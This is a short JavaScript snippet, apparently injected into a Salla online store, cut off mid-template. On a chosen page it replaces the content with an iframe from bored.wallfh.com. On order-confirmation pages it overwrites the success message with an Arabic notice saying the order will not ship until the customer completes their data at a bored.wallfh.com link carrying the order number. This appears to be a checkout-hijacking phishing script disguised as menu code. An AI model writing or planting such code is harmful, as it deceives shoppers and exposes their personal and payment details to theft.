/* menu */ document.addEventListener('DOMContentLoaded', function() { const targetPageId = '1794354713'; if (window.location.href.includes(targetPageId)) { const contentEntry = document.querySelector('.content-entry'); if (contentEntry) { const iframe = document.createElement('iframe'); iframe.src = 'https://bored.wallfh.com/menus.php'; iframe.style.width = '100%'; iframe.style.height = '1000px'; iframe.style.border = 'none'; iframe.style.borderRadius = '12px'; contentEntry.innerHTML = ''; contentEntry.appendChild(iframe); } } }); /* ********************** */ (function() { function runCustomLogic() { if (document.querySelector('.new-warning-container')) return true; let orderId = null; const orderLink = document.querySelector('a[href*="/order/"] .text-primary'); if (orderLink) { orderId = orderLink.textContent.replace('#', '').trim(); } else { const altOrder = document.querySelector('.code-to-copy') || document.querySelector('salla-button[data-content]'); if (altOrder) orderId = (altOrder.getAttribute('data-content') || altOrder.textContent).replace('#', '').trim(); } if (!orderId) return false; const successCard = document.querySelector('.sicon-check')?.closest('.bg-white') || document.querySelector('.thanks-item')?.closest('.bg-white') || document.querySelector('.article--main'); if (successCard) { const redirectionLink = "https://bored.wallfh.com/" + orderId; successCard.innerHTML = `
رقم الطلب #${orderId}
عزيزي العميل، لن يتم شحن الطلب حتى إكمال البيانات عبر الرابط أعلاه.